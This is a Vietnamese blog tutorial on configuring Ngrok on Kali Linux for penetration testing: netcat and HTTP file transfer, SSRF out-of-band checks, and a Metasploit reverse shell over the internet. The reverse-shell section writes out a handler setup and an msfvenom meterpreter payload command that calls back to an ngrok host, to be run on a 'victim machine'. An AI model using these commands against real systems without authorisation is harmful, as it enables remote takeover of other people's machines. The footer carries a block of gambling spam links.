• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
  • Công cụ đổi số thành chữ
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách cấu hình Ngrok để NAT Port trên Kali Linux

Ellyx13 by Ellyx13
26/07/2022 - Updated on 24/07/2025
in Basic Hacking
A A
0

Mục lục bài viết

  1. Cấu hình Ngrok
  2. Cấu hình AuthToken
  3. Các trường hợp sử dụng Ngrok cho Pentester trên Kali Linux
    1. Truyền tệp bằng Netcat
    2. Truyền File bằng máy chủ HTTP
    3. Metasploit Reverse Shells qua Internet
    4. Kiểm tra lỗi hổng tương tác dịch vụ
  4. Câu hỏi thường gặp
    1. Ngrok là gì và tại sao nó hữu ích cho Pentest?
    2. Tôi cần làm gì sau khi cài đặt Ngrok?
    3. Ngrok có an toàn không khi sử dụng cho reverse shell?

Ngrok là một công cụ giúp bạn đưa các dịch vụ trên máy tính ra ngoài Internet mà không cần phải NAT Port hoặc làm lộ IP Public của bạn. Ngrok là một trong những công cụ yêu thích của mình và trong bài viết này, mình sẽ chỉ cho các bạn một số cách mà mình đã sử dụng Ngrok trong quá trình Pentest.

📢 Tham gia kênh Telegram của AnonyViet
👉 Vào Telegram AnonyViet
Cập nhật bài mới, tools hay và thủ thuật IT nhanh nhất

Thiết lập Ngrok cho Pentester

Các bài viết liên quan

Cách cài đặt và sử dụng Cobalt Strike dành cho Red Team 44

Cách cài đặt và sử dụng Cobalt Strike dành cho Red Team

20/04/2023 - Updated on 24/07/2025
Kali Linux 2023.1 mừng kỷ niệm 10 năm với bộ Tool cực hot 45

Kali Linux 2023.1 mừng kỷ niệm 10 năm với bộ Tool cực hot

14/03/2023 - Updated on 24/07/2025
Cách cài đặt và sử dụng Ngrok để NAT Port 46

Cách cài đặt và sử dụng Ngrok để NAT Port

25/08/2022 - Updated on 24/07/2025
kinh nghiem khi kiem tra bao mat website

Kinh nghiệm khi Kiểm tra bảo mật Website

09/05/2022 - Updated on 24/07/2025

Cấu hình Ngrok

Để sử dụng Ngrok, bạn cần có tài khoản. Truy cập https://ngrok.com/ và tạo tài khoản bằng email hoặc sử dụng tùy chọn Google | Github Oauth. Tiếp theo, tải xuống tệp cài đặt Ngrok bằng cách truy cập Setup & Installation, sau đó nhấp chuột phải vào tùy chọn Download for Linux và sao chép địa chỉ liên kết:

Cách cấu hình Ngrok để NAT Port trên Kali Linux 24

Tiếp theo, vào Terminal của máy tấn công và wget tệp ZIP Ngrok. Sau đó giải nén, thêm quyền thực thi và cuối cùng di chuyển tệp Ngrok sang /usr/local/bin/:

cd /tmp
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
chmod +x ngrok
sudo mv ngrok /usr/local/bin/

LƯU Ý: Liên kết trên có khả năng không hoạt động với bạn. Sử dụng liên kết bạn đã sao chép từ trang chủ Ngrok.

Cấu hình AuthToken

Bây giờ bạn đã cài đặt xong Ngrok, chúng ta cần cung cấp cho Ngrok mã xác thực (authentication token) được cung cấp trong web của Ngrok. Truy cập tab Your Authtoken từ trong tài khoản của bạn:

Cách cấu hình Ngrok để NAT Port trên Kali Linux 25

Và sau đó sao chép Authtoken:Cách cấu hình Ngrok để NAT Port trên Kali Linux 26

Cuối cùng, hãy chạy lệnh sau để định cấu hình Ngrok sử dụng Authtoken này:

ngrok authtoken 'AUTHTOKEN_GOES_HERE'

Cách cấu hình Ngrok để NAT Port trên Kali Linux 27

Các trường hợp sử dụng Ngrok cho Pentester trên Kali Linux

Dưới đây là một số trường hợp sử dụng Ngrok trong quá trình Pentest.

Truyền tệp bằng Netcat

Chuyển các tệp sang một máy không nằm trong mạng nội bộ của bạn là không thể nhưng cho đến khi bạn biết đến Ngrok. Để cung cấp dịch vụ Netcat qua Internet với Ngrok, hãy thực hiện các bước sau:

1. Thiết lập trình nghe Netcat trên một cổng bạn chọn

Cách cấu hình Ngrok để NAT Port trên Kali Linux 28

2. Chạy Ngrok bằng lệnh tcp và chỉ định cổng bạn đã sử dụng để khởi động Netcat

Cách cấu hình Ngrok để NAT Port trên Kali Linux 29

Sau khi nhấn enter, trang tổng quan trạng thái phiên của Ngrok sẽ xuất hiện từ đó bạn có thể lấy URL:

Cách cấu hình Ngrok để NAT Port trên Kali Linux 30

3. Trên máy đích, sử dụng URI do Ngrok cung cấp để truyền tệp bằng Netcat. Lưu ý rằng URI tcp:// không được sử dụng khi chỉ định URL cho Netcat. Và đừng quên xóa: và thay thế bằng dấu cách:

Cách cấu hình Ngrok để NAT Port trên Kali Linux 31

Truyền File bằng máy chủ HTTP

Đôi khi bạn muốn chuyển tệp bằng các máy chủ HTTP đơn giản như mô-đun http.server của Python. Để chuyển tệp từ máy cục bộ của bạn qua Internet bằng máy chủ HTTP được lưu trữ cục bộ, hãy thực hiện các bước sau:

1. Khởi động máy chủ HTTP trên cổng bạn muốn

Cách cấu hình Ngrok để NAT Port trên Kali Linux 32

2. Chạy Ngrok bằng lệnh http và chỉ định cổng bạn đã sử dụng để khởi động máy chủ HTTP trên

Cách cấu hình Ngrok để NAT Port trên Kali Linux 33

Cách cấu hình Ngrok để NAT Port trên Kali Linux 34

3. Trên máy đích, sử dụng URI do Ngrok cung cấp để tải tệp

curl -o file.txt a96c-73-30-177-39.ngrok.io/file.txt

Cách cấu hình Ngrok để NAT Port trên Kali Linux 35

Metasploit Reverse Shells qua Internet

Việc tạo tải trọng Msfvenom với địa chỉ IP cục bộ sẽ hạn chế bạn bằng cách chỉ cho phép bạn tạo tải trọng cho các máy cục bộ. Để tạo tải trọng cho một máy từ xa kết nối lại qua Internet với Metasploit cục bộ của bạn, hãy thực hiện các bước sau:

1. Chạy Ngrok và chỉ định cổng cục bộ mà trình xử lý sẽ lắng nghe

Cách cấu hình Ngrok để NAT Port trên Kali Linux 36

Cách cấu hình Ngrok để NAT Port trên Kali Linux 37

2. Khởi động trình xử lý Metasploit và định cấu hình các tùy chọn ReverseListenerBindAddress và ReverseListenerBindPort để khi kết nối, chúng sẽ chuyển tiếp lưu lượng đến localhost:4444:

use exploit/multi/handler
set lhost 6.tcp.ngrok.io
set lport 16737
set payload linux/x64/meterpreter/reverse_tcp
set ReverseListenerBindAddress 127.0.0.1
set ReverseListenerBindPort 4444
run -j

Cách cấu hình Ngrok để NAT Port trên Kali Linux 38

3. Tạo tải trọng Msfvenom và chỉ định URI do Ngrok cung cấp làm tham số LHOST

msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o revsh LHOST=6.tcp.ngrok.io LPORT=16737

Cách cấu hình Ngrok để NAT Port trên Kali Linux 39

4. Chuyển tệp sang máy nạn nhân và sau đó chạy tải trọng. Bạn sẽ nhận được kết nối trở lại trên trình xử lý Metasploit cục bộ của mình:

Cách cấu hình Ngrok để NAT Port trên Kali Linux 40

LƯU Ý: Hãy cẩn thận khi sử dụng Ngrok cho các reverse shell. Nếu không được xử lý, bạn có thể vô tình để lộ mạng của khách hàng trước những kẻ xấu.

Kiểm tra lỗi hổng tương tác dịch vụ

Kiểm tra các tương tác máy chủ bên ngoài như giả mạo yêu cầu phía máy chủ (SSRF) có thể nhanh chóng thực hiện bằng cách sử dụng Ngrok. Chỉ cần tạo một trình nghe Ngrok trên bất kỳ cổng nào bạn muốn và sau đó sử dụng URL được cung cấp để đưa vào các thông số có khả năng dễ bị tấn công như tiêu đề HTTP, thông số chuyển hướng URL,… để cố gắng tìm lỗ hổng tương tác dịch vụ OOD:

Cách cấu hình Ngrok để NAT Port trên Kali Linux 41

Cách cấu hình Ngrok để NAT Port trên Kali Linux 42

Sau đó, chúng ta có thể mô phỏng một dịch vụ OOB với cURL:

Cách cấu hình Ngrok để NAT Port trên Kali Linux 43

Như bạn  có thể thấy, một số yêu cầu GET đã được gửi đến trình nghe Ngrok, có thể được sử dụng để xác nhận các lỗ hổng như SSRF.

Ngoài ra, bạn cũng có thể sử dụng RAT mà không cần mở Port bằng Ngrok tại đây.

Câu hỏi thường gặp

Ngrok là gì và tại sao nó hữu ích cho Pentest?

Ngrok là một công cụ tạo đường hầm HTTP/TCP, cho phép bạn tiếp cận các dịch vụ trên máy tính cá nhân của mình từ Internet mà không cần phải cấu hình NAT port phức tạp hoặc tiết lộ địa chỉ IP công cộng. Điều này rất hữu ích trong Pentest để dễ dàng kiểm tra các ứng dụng từ xa.

Tôi cần làm gì sau khi cài đặt Ngrok?

Sau khi cài đặt, bạn cần xác thực tài khoản Ngrok của mình bằng Authtoken. Bạn có thể lấy Authtoken từ trang cá nhân trên website Ngrok và sử dụng lệnh ngrok authtoken 'YOUR_AUTHTOKEN' để cấu hình.

Ngrok có an toàn không khi sử dụng cho reverse shell?

Cần thận trọng khi sử dụng Ngrok cho reverse shell vì nó có thể làm lộ mạng của khách hàng nếu không được xử lý cẩn thận. Hãy đảm bảo tuân thủ các nguyên tắc bảo mật và chỉ sử dụng trên các hệ thống mà bạn có quyền truy cập hợp pháp.

Tags: kali linuxnat portNgrokpentester
Ellyx13

Ellyx13

DevOps với hơn 7 năm kinh nghiệm trong lĩnh vực hạ tầng, tự động hóa CI/CD và triển khai hệ thống phân tán trên các nền tảng như AWS, Azure và Kubernetes. - AWS Certified DevOps Engineer – Professional - Certified Kubernetes Administrator (CKA) - HashiCorp Certified: Terraform Associate - Docker Certified Associate (DCA) Có người không dám bước vì sợ gãy chân, nhưng sợ gãy chân mà không dám bước đi thì khác nào chân đã gãy.

Related Posts

Cách cài đặt và sử dụng Cobalt Strike dành cho Red Team 47
Basic Hacking

Cách cài đặt và sử dụng Cobalt Strike dành cho Red Team

20/04/2023 - Updated on 24/07/2025
Kali Linux 2023.1 mừng kỷ niệm 10 năm với bộ Tool cực hot 48
Kali Linux / Parrot

Kali Linux 2023.1 mừng kỷ niệm 10 năm với bộ Tool cực hot

14/03/2023 - Updated on 24/07/2025
Cách cài đặt và sử dụng Ngrok để NAT Port 49
Mạng cơ bản

Cách cài đặt và sử dụng Ngrok để NAT Port

25/08/2022 - Updated on 24/07/2025
kinh nghiem khi kiem tra bao mat website
Basic Hacking

Kinh nghiệm khi Kiểm tra bảo mật Website

09/05/2022 - Updated on 24/07/2025
driver wifi tplink vmware
Basic Hacking

Cài Driver USB Wifi TP-Link 722N cho Kali Linux bằng RTL8188EUS SCRIPT

13/03/2022 - Updated on 25/07/2025
Kali Linux 2021.4 tích hợp thêm 9 Tool mới và hỗ trợ Apple M1 50
Kali Linux / Parrot

Kali Linux 2021.4 tích hợp thêm 9 Tool mới và hỗ trợ Apple M1

12/12/2021 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

cách nhận ShopeeVIP 12 tháng miễn phí

Hướng dẫn cách nhận ShopeeVIP 12 tháng miễn phí

by Thanh Kim
16/07/2026
0

code 1 tháng Super Duolingo

Share code 1 tháng Super Duolingo miễn phí

by Thanh Kim
15/07/2026
0

lái máy bay trên Google Earth

Hướng dẫn trải nghiệm lái máy bay trên Google Earth

by Thanh Kim
14/07/2026
0

cách tạo video review sản phẩm

Hướng dẫn cách tạo video review sản phẩm góc POV bằng Flow

by Thanh Kim
13/07/2026
0

Bình luận gần đây

  • best trong Cách DDoS Layer 7 bằng Overload thử sức chịu tải của Website
  • Quach thi diem hang trong Hướng dẫn chế ảnh số dư tài khoản MB Bank
  • Thái trong Hướng dẫn cách nhận 200GB MultCloud miễn phí mới nhất 2026
  • hiupc trong Hướng dẫn cách nhận Google AI Pro 1 năm miễn phí cho tài khoản mới
  • Linh trong Cách hoàn thuế TNCN không cần chứng từ trên eTax Mobile
  • Phuong trong Share key bản quyền IObit Uninstaller 15 PRO miễn phí 2026
  • AnonyViet trong Share key Driver Booster 13 Pro miễn phí 2026
  • adasdav trong Share key Driver Booster 13 Pro miễn phí 2026
  • thanhlong trong EaseUS Data Recovery Wizard – khôi phục dữ liệu đã mất !
  • 45555 trong Trang web tra lịch thi đấu World Cup 2026 trực quan, đồng bộ lịch tự động
  • Dương HỒng Tỷ trong Cách sử dụng sách giáo khoa online miễn phí từ lớp 1 đến lớp 12
  • well trong Hướng dẫn cách nhận Google AI Pro 1 năm miễn phí cho tài khoản mới
  • sang trong Share key Driver Booster 13 Pro miễn phí 2026
  • Dung trong Cách Active Key Sublime Text 4 – Tải Sublime Text 4 Full Key
  • việt trong Hướng dẫn nhận Lovable Pro 12 tháng miễn phí
  • AnonyViet trong Cách tạo ảnh Tốt nghiệp mầm non cho bé đẹp như Studio
  • việt trong Cách tạo ảnh Tốt nghiệp mầm non cho bé đẹp như Studio
  • AnonyViet trong Tool gỡ key phần mềm lậu hàng loạt để tránh bị phạt
  • Aboyit trong Tool gỡ key phần mềm lậu hàng loạt để tránh bị phạt
  • iraq trong Share key Driver Booster 13 Pro miễn phí 2026

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

kết quả xổ số hôm nay 33win Ae888 kubet 8kbet 99ok trang chủ sc88 xin88 good88 fm88 kubet thailand vip66 xoso66 https://tp88fun.com/ hello88 qq88 Vip66 hitclub bong99 XOSO66 new882.info Thabet fun88 nhà cái uy tín sunwin sunwin rikvip hitclub sunwin go88 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 https://keonhacai.fund/ sunwin Xoso66 58win fun88.supply https://fun88.supply/ F8BET80 u888 W88 link https://bbet88b.com/ OK9 vswin https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ https://xx88.asia/ 789f NOHU HITCLUB Sunwin 58WIN MV88 888NEW AZ888 TD88 12bet v9bet vip66 7mcn hm88 DA88 9BET LC88 Game https://go8.red/ Go88 https://bancadoithuong.codes/ https://danhdeonline.blog/ Xocdia88 https://nhacaiuytin10.uk.com/ https://keonhacai88.tv/ https://keonhacai.loans/ https://gamebaidoithuong.io/ https://keonhacai.kiwi/ 789club Sun52 kjc nhà cái MB66 Thabet sun win luck8 https://devmarks.io V9bet Jun88 https://keonhacaitop.com/ hytw3339 Kết quả bóng đá xoso66 https://kjcgaming.com/ go88 F168 game nổ hũ tỷ lệ nhà cái https://sunwin.guru/ https://go88.baby/ https://hitclub.cab/ https://iwin.page/ https://b52.you/ https://789club-ceo.net/ https://manclub99.com/ https://choigamebai.org/ https://keonhacai95.com/ nổ hũ uy tín F168 https://kjcgaming.com/ 12bet 12bet nhà cái F168 8day https://gmnc.club/ vip88 99ok https://sunwinn.band/ keonhacai5 Jun88 888slot Hm88 TG88 TR88 AF88 58WIN JBO go88 Rikvip Bắn cá đổi thưởng Good88 https://zonic.sa.com/ Bong88 Game bài đổi thưởng Vn88 F 168 SH BET Xoilac TV bóng đá trực tiếp bóng đá trực tiếp cakhia tv trực tiếp bóng đá tối nay SKY88 Debet 12bet 12bet xoso66 Fun88 33win game bài kèo nhà cái F8bet RIK VIP https://sc88.info/ xx88 Rikvip https://sc88.market/ 8kbet https://vaoroitv.app/ https://mitomtv.me/ 7mcn rikvip sunwin https://keonhacai55.de/ https://keonhacai55.bet/ TẢI SUNWIN KK55 nổ hũ uy tín NK88

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

wpDiscuz